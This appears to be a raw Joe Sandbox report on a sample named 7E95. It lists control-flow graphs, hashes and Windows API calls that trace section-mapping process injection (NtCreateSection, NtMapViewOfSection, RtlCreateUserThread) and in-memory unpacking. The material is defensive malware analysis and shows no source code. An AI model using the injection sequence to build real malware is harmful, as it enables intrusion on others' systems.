                                                                                                                          • Opcode Fuzzy Hash: 7b7d6308fa4ba266436286a607709f1be1a66838caa3c92c62cfa2a56e0de30a
                                                                                                                          • Instruction Fuzzy Hash: 0C512971900204BBEB209F91CC49FAFBBB8FF85B00F144169FA11BA2E5D6759901CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 271 401539-401570 call 4011a2 278 401572 271->278 279 401575-40157a 271->279 278->279 281 401580-401591 279->281 282 40189d-4018a5 279->282 285 401597-4015c0 281->285 286 40189b 281->286 282->279 287 4018aa-4018ce 282->287 285->286 295 4015c6-4015dd NtDuplicateObject 285->295 286->287 298 4018d4-4018d9 287->298 299 4018dd 287->299 295->286 296 4015e3-401607 NtCreateSection 295->296 300 401663-401689 NtCreateSection 296->300 301 401609-40162a NtMapViewOfSection 296->301 303 4018e0-4018e9 call 4011a2 298->303 299->298 299->303 300->286 302 40168f-401693 300->302 301->300 304 40162c-401648 NtMapViewOfSection 301->304 302->286 305 401699-4016ba NtMapViewOfSection 302->305 304->300 307 40164a-401660 304->307 305->286 308 4016c0-4016dc NtMapViewOfSection 305->308 307->300 308->286 310 4016e2 call 4016e7 308->310
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: be0b142dca8424e22e46bddfe0649438fd2993410129d82c934823231531ba28
                                                                                                                          • Instruction ID: ab73f6be26f1869c353e243fb9bd1c98976a94d43ce8117269a76a7e75d45a71
                                                                                                                          • Opcode Fuzzy Hash: be0b142dca8424e22e46bddfe0649438fd2993410129d82c934823231531ba28
                                                                                                                          • Instruction Fuzzy Hash: C7512A71900204BFEB209F91DC49FAF7BB8FF85B00F144159F911BA2E5D6759941CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 313 401547-401570 call 4011a2 320 401572 313->320 321 401575-40157a 313->321 320->321 323 401580-401591 321->323 324 40189d-4018a5 321->324 327 401597-4015c0 323->327 328 40189b 323->328 324->321 329 4018aa-4018ce 324->329 327->328 337 4015c6-4015dd NtDuplicateObject 327->337 328->329 340 4018d4-4018d9 329->340 341 4018dd 329->341 337->328 338 4015e3-401607 NtCreateSection 337->338 342 401663-401689 NtCreateSection 338->342 343 401609-40162a NtMapViewOfSection 338->343 345 4018e0-4018e9 call 4011a2 340->345 341->340 341->345 342->328 344 40168f-401693 342->344 343->342 346 40162c-401648 NtMapViewOfSection 343->346 344->328 347 401699-4016ba NtMapViewOfSection 344->347 346->342 349 40164a-401660 346->349 347->328 350 4016c0-4016dc NtMapViewOfSection 347->350 349->342 350->328 352 4016e2 call 4016e7 350->352
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: e92176b42270aac8b5331a90937cedd234a5388deceadf7c1319d5363699bff3
                                                                                                                          • Instruction ID: bb1ffa6529b5e84b209e31d4d1803d42436e16298623707dd7286bb68b9f9455
                                                                                                                          • Opcode Fuzzy Hash: e92176b42270aac8b5331a90937cedd234a5388deceadf7c1319d5363699bff3
                                                                                                                          • Instruction Fuzzy Hash: FC5129B1900205BBEB209F91CC49FAFBBB8FF85B00F144129FA11BA2E5D6759941CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 355 40154a-401570 call 4011a2 359 401572 355->359 360 401575-40157a 355->360 359->360 362 401580-401591 360->362 363 40189d-4018a5 360->363 366 401597-4015c0 362->366 367 40189b 362->367 363->360 368 4018aa-4018ce 363->368 366->367 376 4015c6-4015dd NtDuplicateObject 366->376 367->368 379 4018d4-4018d9 368->379 380 4018dd 368->380 376->367 377 4015e3-401607 NtCreateSection 376->377 381 401663-401689 NtCreateSection 377->381 382 401609-40162a NtMapViewOfSection 377->382 384 4018e0-4018e9 call 4011a2 379->384 380->379 380->384 381->367 383 40168f-401693 381->383 382->381 385 40162c-401648 NtMapViewOfSection 382->385 383->367 386 401699-4016ba NtMapViewOfSection 383->386 385->381 388 40164a-401660 385->388 386->367 389 4016c0-4016dc NtMapViewOfSection 386->389 388->381 389->367 391 4016e2 call 4016e7 389->391
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 81221b2c84142187e1d35f3e591f8c940fc9a2008a3bf4f11d5effe31d7e480b
                                                                                                                          • Instruction ID: 73889b9f897e247929119ec4d5a15b8180899db468f71b6cabb84e263ce8337d
                                                                                                                          • Opcode Fuzzy Hash: 81221b2c84142187e1d35f3e591f8c940fc9a2008a3bf4f11d5effe31d7e480b
                                                                                                                          • Instruction Fuzzy Hash: EB5118B1900209BFEB209F91DC89FEFBBB8FF85B00F144159F911BA2A5D6719941CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 394 401558-401570 call 4011a2 398 401572 394->398 399 401575-40157a 394->399 398->399 401 401580-401591 399->401 402 40189d-4018a5 399->402 405 401597-4015c0 401->405 406 40189b 401->406 402->399 407 4018aa-4018ce 402->407 405->406 415 4015c6-4015dd NtDuplicateObject 405->415 406->407 418 4018d4-4018d9 407->418 419 4018dd 407->419 415->406 416 4015e3-401607 NtCreateSection 415->416 420 401663-401689 NtCreateSection 416->420 421 401609-40162a NtMapViewOfSection 416->421 423 4018e0-4018e9 call 4011a2 418->423 419->418 419->423 420->406 422 40168f-401693 420->422 421->420 424 40162c-401648 NtMapViewOfSection 421->424 422->406 425 401699-4016ba NtMapViewOfSection 422->425 424->420 427 40164a-401660 424->427 425->406 428 4016c0-4016dc NtMapViewOfSection 425->428 427->420 428->406 430 4016e2 call 4016e7 428->430
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 6cb4cf7ec8c4aa9f352f3b2035ad9a7fad4858be555ae42f38005e902a6a77cf
                                                                                                                          • Instruction ID: 49d8221448c3955a76666fa3ffd29bc600bb2af73250b349d1abf15cb38a88ba
                                                                                                                          • Opcode Fuzzy Hash: 6cb4cf7ec8c4aa9f352f3b2035ad9a7fad4858be555ae42f38005e902a6a77cf
                                                                                                                          • Instruction Fuzzy Hash: DE510875900209BBEB209F91DC48FAFBBB8FF85B10F144159F911BA2A5D6719940CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 434 402f78-402f81 435 402fe3-402ffa 434->435 436 402f83-402fa2 434->436 438 403000-403018 435->438 439 403119-40311e 435->439 437 402fa4-402fa7 436->437 440 402fd3-402fd5 437->440 441 402fa9-402fb4 437->441 438->439 442 40301e-40302f 438->442 443 402fb7-402fc0 441->443 444 403031-40303a 442->444 445 402fc2-402fcd 443->445 446 402fcf 443->446 447 40303f-40304d 444->447 445->446 446->443 448 402fd1 446->448 447->447 449 40304f-403056 447->449 448->437 450 403078-40307f 449->450 451 403058-403077 449->451 452 4030a1-4030a4 450->452 453 403081-4030a0 450->453 451->450 454 4030a6-4030a9 452->454 455 4030ad 452->455 453->452 454->455 456 4030ab 454->456 455->444 457 4030af-4030b4 455->457 456->457 457->439 458 4030b6-4030b9 457->458 458->439 459 4030bb-403116 RtlCreateUserThread NtTerminateProcess 458->459 459->439
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a41bdb4e3576f522a12336801813d72270e18e7e689e52f62717f67e63f430c0
                                                                                                                          • Instruction ID: 317511f5db5be22a1ba2fc0587e19514aeff4a670df2f05a3bf787a50cc01e0b
                                                                                                                          • Opcode Fuzzy Hash: a41bdb4e3576f522a12336801813d72270e18e7e689e52f62717f67e63f430c0
                                                                                                                          • Instruction Fuzzy Hash: D3514832618E098BC778EE2CA8496A377E1EB94351F1A437BD809D7389EF34D84187C5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 460 402fd6-402ffa 461 403000-403018 460->461 462 403119-40311e 460->462 461->462 463 40301e-40302f 461->463 464 403031-40303a 463->464 465 40303f-40304d 464->465 465->465 466 40304f-403056 465->466 467 403078-40307f 466->467 468 403058-403077 466->468 469 4030a1-4030a4 467->469 470 403081-4030a0 467->470 468->467 471 4030a6-4030a9 469->471 472 4030ad 469->472 470->469 471->472 473 4030ab 471->473 472->464 474 4030af-4030b4 472->474 473->474 474->462 475 4030b6-4030b9 474->475 475->462 476 4030bb-403116 RtlCreateUserThread NtTerminateProcess 475->476 476->462
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: edc994cd46d5a812d08eeb49cc0d47fdc603a55ed17fcc0beff47836172b95c0
                                                                                                                          • Instruction ID: daaa7f2e38d7aad3cc82e5be57a4a785f230c8f25ca3b67180aeecf2142c6842
                                                                                                                          • Opcode Fuzzy Hash: edc994cd46d5a812d08eeb49cc0d47fdc603a55ed17fcc0beff47836172b95c0
                                                                                                                          • Instruction Fuzzy Hash: C3412632618E084FD768EE6CA88966377D5E798311B16437AE809D3389EF34DC5187C5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 477 403127-40312e 478 403130-40316e 477->478 479 4030c6-403116 RtlCreateUserThread NtTerminateProcess 477->479 485 403170 478->485 486 403178-403182 478->486 480 403119-40311e 479->480 485->486 487 403172-403173 485->487 488 403184 486->488 489 40318b-4031a7 call 40121d 486->489 487->486 488->489 490 403186-403187 488->490 495 4031aa 489->495 490->489 495->495
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: 7d3e2b9648a9261650c6bc1a39b9e58fc6fc2dc5d5c75c30e08462082bd13ea6
                                                                                                                          • Instruction ID: 2bca1af81f2e8b22f73ff0c878c7645be0435f849722be829624dba4d2441b2c
                                                                                                                          • Opcode Fuzzy Hash: 7d3e2b9648a9261650c6bc1a39b9e58fc6fc2dc5d5c75c30e08462082bd13ea6
                                                                                                                          • Instruction Fuzzy Hash: D3116A7150CB489AE324DF789889277BF99E74C326F28067FD081EA2C0C63D4646878B
                                                                                                                          APIs
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1323581903-0
                                                                                                                          • Opcode ID: c950319b117f7626d8f94a7f96971618ffb846fc13eca1edb7cc1ee4f19368c4
                                                                                                                          • Instruction ID: 6fd82a02406858ea4bdd09e5f07fd8f1378e60a0efeacf51415e6c10d2a1a0e8
                                                                                                                          • Opcode Fuzzy Hash: c950319b117f7626d8f94a7f96971618ffb846fc13eca1edb7cc1ee4f19368c4
                                                                                                                          • Instruction Fuzzy Hash: E621CF36909100EBDB149A50DC84ABA73B5AB94700F38853BE843372F0E67C6843E69F

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 88003c-880047 1 880049 0->1 2 88004c-880263 call 880a3f call 880e0f call 880d90 VirtualAlloc 0->2 1->2 17 88028b-880292 2->17 18 880265-880289 call 880a69 2->18 20 8802a1-8802b0 17->20 21 8802ce-8803c2 VirtualProtect call 880cce call 880ce7 18->21 20->21 22 8802b2-8802cc 20->22 29 8803d1-8803e0 21->29 22->20 30 880439-8804b8 VirtualFree 29->30 31 8803e2-880437 call 880ce7 29->31 33 8804be-8804cd 30->33 34 8805f4-8805fe 30->34 31->29 38 8804d3-8804dd 33->38 35 88077f-880789 34->35 36 880604-88060d 34->36 42 88078b-8807a3 35->42 43 8807a6-8807b0 35->43 36->35 39 880613-880637 36->39 38->34 41 8804e3-880505 38->41 46 88063e-880648 39->46 50 880517-880520 41->50 51 880507-880515 41->51 42->43 44 88086e-8808be LoadLibraryA 43->44 45 8807b6-8807cb 43->45 55 8808c7-8808f9 44->55 48 8807d2-8807d5 45->48 46->35 49 88064e-88065a 46->49 52 880824-880833 48->52 53 8807d7-8807e0 48->53 49->35 54 880660-88066a 49->54 58 880526-880547 50->58 51->58 62 880839-88083c 52->62 59 8807e2 53->59 60 8807e4-880822 53->60 61 88067a-880689 54->61 56 8808fb-880901 55->56 57 880902-88091d 55->57 56->57 63 88054d-880550 58->63 59->52 60->48 64 88068f-8806b2 61->64 65 880750-88077a 61->65 62->44 66 88083e-880847 62->66 68 8805e0-8805ef 63->68 69 880556-88056b 63->69 70 8806ef-8806fc 64->70 71 8806b4-8806ed 64->71 65->46 72 880849 66->72 73 88084b-88086c 66->73 68->38 74 88056d 69->74 75 88056f-88057a 69->75 76 88074b 70->76 77 8806fe-880748 70->77 71->70 72->44 73->62 74->68 78 88059b-8805bb 75->78 79 88057c-880599 75->79 76->61 77->76 84 8805bd-8805db 78->84 79->84 84->63
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_880000_7E95.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 433 41cde0-41cf1e GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(008088A0), ref: 0041CEBC
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00422E88), ref: 0041CEF9
                                                                                                                          • VirtualProtect.KERNELBASE(008086E4,0080889C,00000040,?), ref: 0041CF19
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_410000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: 63e7f34a71685d7892ce337dae1720ac853fb232cfaf137423b4217087dad714
                                                                                                                          • Instruction ID: 5e9b0be0c38538113afdd707655b30fe7f9fd3bb817dcaf521530bd74a9323a7
                                                                                                                          • Opcode Fuzzy Hash: 63e7f34a71685d7892ce337dae1720ac853fb232cfaf137423b4217087dad714
                                                                                                                          • Instruction Fuzzy Hash: 06312810618680EAF351DB28FE057123AA2BB65704F858079D5C88B3F1DBFA4599E72E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 496 a3f98b-a3f9a4 497 a3f9a6-a3f9a8 496->497 498 a3f9aa 497->498 499 a3f9af-a3f9bb CreateToolhelp32Snapshot 497->499 498->499 500 a3f9cb-a3f9d8 Module32First 499->500 501 a3f9bd-a3f9c3 499->501 502 a3f9e1-a3f9e9 500->502 503 a3f9da-a3f9db call a3f64a 500->503 501->500 506 a3f9c5-a3f9c9 501->506 507 a3f9e0 503->507 506->497 506->500 507->502
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A3F9B3
                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00A3F9D3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3C000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_a3c000_7E95.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3833638111-0
                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction ID: a340a932f82cbd297c5dc9a6c10f774d609247f1c9fa425a0fc1babf06cfb786
                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction Fuzzy Hash: 98F09032A10711BFDB203BF9AC8EB6EB6E8AF49724F100639F646911C0DB70EC454A61

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 509 880e0f-880e24 SetErrorMode * 2 510 880e2b-880e2c 509->510 511 880e26 509->511 511->510
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_880000_7E95.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction ID: f2f6d8dcacfc00e91535e2c3d4d44eba824c5639ec75f1ad12dbbdf9da4bc129
                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction Fuzzy Hash: D6D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994047E5
                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNELBASE(008088A0,0041D513), ref: 0041CFAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_410000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 024ab63b414873ef03464b928d0b8362a676f26a6441c26e9dd5149b43b9935a
                                                                                                                          • Instruction ID: 64082fb71159e5cc311bf08b62d63a82f9138f51dc230dda9aa1e162ed46e083
                                                                                                                          • Opcode Fuzzy Hash: 024ab63b414873ef03464b928d0b8362a676f26a6441c26e9dd5149b43b9935a
                                                                                                                          • Instruction Fuzzy Hash: 03F06D04728640CAF784DB69FD1171222A2FFA8700F94E4399589C77F4EF7A4591C31E
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 0040193B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: 84f22a14fecf5131f0cebf7672270732d22fceb3ab4575de4c79c481780fc091
                                                                                                                          • Instruction ID: 4c36ad83e294ba41db671b0a4fc56ed01a1a88e1cd5efd68717e2b465456e1b3
                                                                                                                          • Opcode Fuzzy Hash: 84f22a14fecf5131f0cebf7672270732d22fceb3ab4575de4c79c481780fc091
                                                                                                                          • Instruction Fuzzy Hash: FB11ADB2248305FAEB016A919C61EBA3725AB84725F304537FA13790F1857D8612F62F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 0040193B
                                                                                                                            • Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                            • Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: f05674d040b89a3fd3233f146825ae66065897a8a3cb07f3275a079ef6497881
                                                                                                                          • Instruction ID: d31a3e55155ec5b2861cda6a9190afa861277f927d9f51d2222c05ee6f2c8101
                                                                                                                          • Opcode Fuzzy Hash: f05674d040b89a3fd3233f146825ae66065897a8a3cb07f3275a079ef6497881
                                                                                                                          • Instruction Fuzzy Hash: 400180B224C205FAEB016A959C61E7A3629AB85724F304533FA53790F1857C8613F66F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 0040193B
                                                                                                                            • Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                            • Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
